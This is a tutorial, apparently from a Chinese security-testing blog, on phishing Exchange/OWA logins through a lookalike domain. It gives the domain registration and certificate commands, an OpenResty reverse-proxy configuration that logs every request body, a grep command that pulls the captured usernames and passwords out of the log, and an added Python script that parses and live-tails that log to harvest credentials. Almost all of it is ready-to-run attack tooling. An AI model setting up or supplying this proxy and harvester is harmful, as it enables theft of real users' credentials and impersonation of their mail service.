Watering-hole (credential phishing) attack built on an Nginx reverse proxy
Statement
Anyone who spreads or makes use of the information in this article bears sole responsibility for any direct or indirect consequences and losses; 雷神眾測 (Thunder crowdsourced testing) and the author accept no liability for them.
雷神眾測 holds the right to modify and interpret this article. Anyone reproducing or redistributing it must keep it complete, including the copyright notice and all other content. Without permission from 雷神眾測 its contents may not be altered, abridged or extended, nor used for commercial purposes in any way.
Steps
Note: because every request is relayed to the real site, nothing but the domain name changes from the visitor's point of view; no cloning of the target site or other tedious setup is needed.
Scenario: impersonate the target's Exchange/Outlook Web App logon page and trick users into entering their username and password.
Lookalike domain: mail.exchange-`0`utlook.com (the digit zero in place of the letter o)
Impersonated domain: mail.exchange-outlook.com
Register mail.exchange-`0`utlook.com and point its A record at the attack server.
Install certbot and OpenResty on that server as described below.
Update the package index and install the build dependencies:
```bash
apt-get update -y
apt-get install -y libpcre3-dev libssl-dev perl make build-essential curl zlib1g-dev
```
Install Certbot on Ubuntu (pick the line that matches your release):
```bash
apt install certbot python3-certbot-nginx   # releases that ship the Python 3 nginx plugin
apt install certbot python-certbot-nginx    # older releases that still ship the Python 2 plugin
```
Use Certbot to obtain a free Let's Encrypt certificate; a valid HTTPS padlock makes the lookalike far more convincing.
```bash
certbot --nginx -d mail.exchange-0utlook.com
```
Certbot's nginx plugin locates the server block for that domain, writes the certificate paths into it and asks whether to redirect all HTTP traffic to HTTPS; choose the redirect and Certbot reloads nginx itself, after which the site answers over HTTPS. Let's Encrypt certificates are valid for 90 days.

Caveat: the `--nginx` plugin only works with an nginx it can find, normally the distro package under /etc/nginx (the `root /var/www/html` and `index.nginx-debian.html` lines in the configuration further down are inherited from the Ubuntu package's default site). If only OpenResty is installed, either obtain the certificate with `certbot certonly --standalone -d mail.exchange-0utlook.com` while port 80 is free, or point the plugin at OpenResty with `--nginx-server-root /usr/local/openresty/nginx/conf --nginx-ctl /usr/local/openresty/nginx/sbin/nginx`. Either way, only the `/etc/letsencrypt/live/...` paths are needed for the OpenResty configuration.

```bash
certbot certificates   # show certificate status
certbot renew          # renew certificates that expire within the next 30 days
certbot revoke         # revoke a certificate
certbot delete         # delete a certificate after revoking it
```
Check the certificate's status and file paths:
```text
root@10-7-16-132:/home/ubuntu# certbot certificates
Saving debug log to /var/log/letsencrypt/letsencrypt.log
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Found the following certs:
  Certificate Name: mail.exchange-0utlook.com
    Domains: mail.exchange-0utlook.com
    Expiry Date: 2022-09-08 03:09:57+00:00 (VALID: 86 days)
    Certificate Path: /etc/letsencrypt/live/mail.exchange-0utlook.com/fullchain.pem
    Private Key Path: /etc/letsencrypt/live/mail.exchange-0utlook.com/privkey.pem
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
```
Install OpenResty on Ubuntu with install_openresty.sh (https://gist.github.com/k8scat/0adca267c15ae9f3ed39770803e82ec3#file-install_openresty-sh):
```bash
#!/bin/bash
set -e

rm -rf openresty-1.19.3.2 openresty-1.19.3.2.tar.gz

apt-get update -y
apt-get install -y libpcre3-dev \
  libssl-dev \
  perl \
  make \
  build-essential \
  curl \
  zlib1g-dev

curl -LO https://openresty.org/download/openresty-1.19.3.2.tar.gz
tar zxf openresty-1.19.3.2.tar.gz
cd openresty-1.19.3.2

./configure \
  --with-http_gzip_static_module \
  --with-http_v2_module \
  --with-http_stub_status_module
make
make install

mkdir -p /usr/lib/systemd/system
cat > /tmp/openresty.service <<'EOF'
# Stop dance for OpenResty
# =========================
#
# ExecStop sends SIGQUIT (graceful stop) to OpenResty's nginx process.
# If, after 5s (--retry QUIT/5) nginx is still running, systemd takes control
# and sends SIGTERM (fast shutdown) to the main process.
# After another 5s (TimeoutStopSec=5), and if nginx is alive, systemd sends
# SIGKILL to all the remaining processes in the process group (KillMode=mixed).
#
# nginx signals reference doc:
# http://nginx.org/en/docs/control.html
#
[Unit]
Description=The OpenResty Application Platform
After=syslog.target network-online.target remote-fs.target nss-lookup.target
Wants=network-online.target

[Service]
Type=forking
PIDFile=/usr/local/openresty/nginx/logs/nginx.pid
ExecStartPre=/usr/local/openresty/nginx/sbin/nginx -t -q -g 'daemon on; master_process on;'
ExecStart=/usr/local/openresty/nginx/sbin/nginx -g 'daemon on; master_process on;'
ExecReload=/usr/local/openresty/nginx/sbin/nginx -g 'daemon on; master_process on;' -s reload
ExecStop=-/sbin/start-stop-daemon --quiet --stop --retry QUIT/5 --pidfile /usr/local/openresty/nginx/logs/nginx.pid
TimeoutStopSec=5
KillMode=mixed

[Install]
WantedBy=multi-user.target
EOF
# systemd only looks in its unit directories, so install the unit there
cp /tmp/openresty.service /usr/lib/systemd/system/openresty.service

# systemctl enable openresty
# systemctl start openresty
# systemctl status openresty

cd ..
rm -rf openresty-1.19.3.2 openresty-1.19.3.2.tar.gz
```
Create or edit /etc/openresty/nginx.conf (back up the default configuration before overwriting it):
```nginx
worker_processes 1;

#error_log logs/error.log;
#error_log logs/error.log notice;
#error_log logs/error.log info;

#pid logs/nginx.pid;

events {
    worker_connections 1024;
}

http {
    include mime.types;
    default_type application/octet-stream;

    # one record per request: time, client address, request headers, request body
    log_format logeverything '======$current_time - $remote_addr$request_headers$request_body=======';

    keepalive_timeout 65;

    server {
        set $request_headers "";
        set $current_time "";

        root /var/www/html;
        # Add index.php to the list if you are using PHP
        index index.html index.htm index.nginx-debian.html;

        server_name mail.exchange-0utlook.com; # managed by Certbot

        listen [::]:443 ssl ipv6only=on; # managed by Certbot
        listen 443 ssl; # managed by Certbot
        ssl_certificate /etc/letsencrypt/live/mail.exchange-0utlook.com/fullchain.pem; # managed by Certbot
        ssl_certificate_key /etc/letsencrypt/live/mail.exchange-0utlook.com/privkey.pem; # managed by Certbot
        include /etc/letsencrypt/options-ssl-nginx.conf; # managed by Certbot
        ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot

        location / {
            proxy_pass https://mail.exchange-outlook.com/;
            proxy_set_header Host $host;
            proxy_cookie_domain mail.exchange-outlook.com $host;                        # impersonated site
            proxy_set_header referer "https://mail.exchange-outlook.com$request_uri";   # impersonated site
            proxy_set_header User-Agent $http_user_agent;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header REMOTE-HOST $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            proxy_connect_timeout 300;
            proxy_buffering off;
            proxy_send_timeout 300;
        }

        access_log logs/cool.log logeverything; # captured HTTP data
    }
}
```
Points worth knowing about this configuration:
- `$current_time` and `$request_headers` are set to empty strings and nothing ever fills them, so each record contains only the client address glued directly onto the request body. The built-in `$time_local` gives a timestamp without any Lua; capturing headers is what OpenResty's Lua hooks would be for, but this configuration does not use them.
- `$request_body` is only populated when nginx has read the body into memory, which is the default with `proxy_pass`; requests without a body log `-`, and bodies larger than `client_body_buffer_size` are spilled to a temp file and not logged. Logon POSTs are small, so they are captured.
- `Host` is forwarded as `$host`, i.e. the lookalike name. OWA on IIS usually accepts that, but an upstream that validates `Host` or relies on SNI needs `proxy_set_header Host mail.exchange-outlook.com;` and `proxy_ssl_server_name on;`.
- `proxy_cookie_domain` rewrites the `Domain` attribute of upstream cookies so the browser sends them back to the proxy; nginx's default `proxy_redirect` likewise rewrites `Location` headers that point at `https://mail.exchange-outlook.com/`.
- Only port 443 is served; the HTTP-to-HTTPS redirect Certbot added went into the stock nginx configuration, not this file.
Start nginx with this configuration file:
```bash
/usr/local/openresty/nginx/sbin/nginx -c /etc/openresty/nginx.conf
```
Day-to-day control:
```bash
/usr/local/openresty/nginx/sbin/nginx              # start (loads conf/nginx.conf under the OpenResty prefix unless -c is given)
/usr/local/openresty/nginx/sbin/nginx -s stop      # stop
/usr/local/openresty/nginx/sbin/nginx -s reload    # reload the running master's configuration
```
If the stock Ubuntu nginx that Certbot configured is still running it already owns ports 80 and 443 and OpenResty's bind fails; stop it first (`systemctl disable --now nginx`). A bare `nginx` or the systemd unit reads /usr/local/openresty/nginx/conf/nginx.conf rather than /etc/openresty/nginx.conf, so either always pass `-c` or copy the file to that path.
Result of visiting the two sites (screenshot omitted):

Visit https://mail.exchange-0utlook.com/, enter a username and password, then pull the captured credentials out of the log:
```bash
grep -oE 'username=[^&]*&password=[^&]*' /usr/local/openresty/nginx/logs/cool.log
```
POSIX ERE has no lazy `.*?`, so each value is bounded with `[^&]*` instead; the values are still URL-encoded (for example `%5C` for a backslash in `DOMAIN\user`), and the pairing assumes the form posts `username` and `password` next to each other, as the OWA logon form does.

TODO: this was put together in a hurry; a file-monitoring script that watches the log and automatically pushes the relevant fields (username and password) to DingTalk or another platform is still needed.
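The parser below is an added example, not code from the original post. It reads records in the `logeverything` format defined by the nginx.conf above, undoes nginx's `\xHH` log escaping, URL-decodes the form fields and returns the `username`/`password` pair, which is what the grep above does only approximately (encoded values, no lazy match). The `follow` generator is the file monitor the TODO asks for; forwarding results to DingTalk or elsewhere is left to the reader. The sample log lines are constructed for this example, the OWA-style field names (`destination`, `flags`, `forcedownlevel`, `isUtf8`) are illustrative, and the parser assumes clients arrive over IPv4 because the log_format has no separator between `$remote_addr` and `$request_body`.

```python
"""Parse the ``logeverything`` access-log records written by the nginx.conf above.

Record layout, from that config's log_format:
    ======$current_time - $remote_addr$request_headers$request_body=======
As written, $current_time and $request_headers are set to "" (logged as nothing),
so $remote_addr is glued straight onto $request_body, and nginx logs "-" for
requests that carried no body. Form values in $request_body are URL-encoded.
"""
import re
import time
from typing import Dict, Iterator, List, Optional
from urllib.parse import parse_qs

# Assumption: clients arrive over IPv4, so the address is a dotted quad that ends
# where the first non-digit/non-dot byte of the body begins. A body that starts
# with a digit would be ambiguous; add a separator after $remote_addr in the
# log_format if that matters.
RECORD_RE = re.compile(
    r"^======(?P<time>.*?) - (?P<ip>\d{1,3}(?:\.\d{1,3}){3})(?P<body>.*?)=======$"
)
# nginx's default access-log escaping writes '"', '\' and non-printable bytes as \xHH.
NGINX_ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})")


def nginx_unescape(text: str) -> str:
    """Undo nginx's \\xHH log escaping."""
    return NGINX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), text)


def parse_record(line: str) -> Optional[Dict[str, object]]:
    """Split one log line into time, client IP and URL-decoded form fields.

    Returns None for lines that do not follow the log_format. When a field
    repeats, the last value wins.
    """
    m = RECORD_RE.match(line.rstrip("\r\n"))
    if m is None:
        return None
    body = nginx_unescape(m.group("body"))
    fields: Dict[str, str] = {}
    if body not in ("", "-"):  # "-" means the request had no body (e.g. GET)
        fields = {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {"time": m.group("time"), "ip": m.group("ip"), "fields": fields}


def extract_credentials(line: str) -> Optional[Dict[str, str]]:
    """Return {'ip', 'username', 'password'} when the record is a logon POST, else None."""
    rec = parse_record(line)
    if rec is None:
        return None
    fields = rec["fields"]
    if "username" not in fields or "password" not in fields:
        return None
    return {"ip": rec["ip"], "username": fields["username"], "password": fields["password"]}


def harvest(lines) -> List[Dict[str, str]]:
    """Run extract_credentials over an iterable of log lines, keeping only hits."""
    found = []
    for line in lines:
        cred = extract_credentials(line)
        if cred is not None:
            found.append(cred)
    return found


def follow(path: str, poll_seconds: float = 1.0) -> Iterator[str]:
    """Yield lines appended to ``path`` after start-up, like ``tail -f`` (no rotation handling)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        fh.seek(0, 2)  # start at the current end of the file
        while True:
            line = fh.readline()
            if not line:
                time.sleep(poll_seconds)
                continue
            yield line


# Constructed sample records (not from the original post), in the exact shape the
# log_format above produces: a GET with no body, an OWA-style logon POST, and a
# body containing a double quote that nginx escaped as \x22.
SAMPLE_LOG = [
    "====== - 203.0.113.5-=======",
    "====== - 203.0.113.5destination=https%3A%2F%2Fmail.exchange-outlook.com%2Fowa%2F"
    "&flags=4&forcedownlevel=0&username=CORP%5Cj.doe&password=Winter%262022%21&isUtf8=1=======",
    "====== - 198.51.100.7username=j.doe&password=a\\x22b=======",
]

if __name__ == "__main__":
    for cred in harvest(SAMPLE_LOG):
        print(cred)
    # Live use: for cred in harvest(follow("/usr/local/openresty/nginx/logs/cool.log")): ...
```

`harvest(follow(...))` is the monitoring loop; whatever notification you hang off it should treat the decoded values as sensitive and not re-encode them into URLs or chat messages unescaped.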
References
OpenResty introduction: https://www.runoob.com/w3cnote/openresty-intro.html
Certbot 1.28.0 documentation: https://eff-certbot.readthedocs.io/en/stable/index.html
How to request a free HTTPS certificate with Certbot: https://www.zhihu.com/question/484431835/answer/2262502859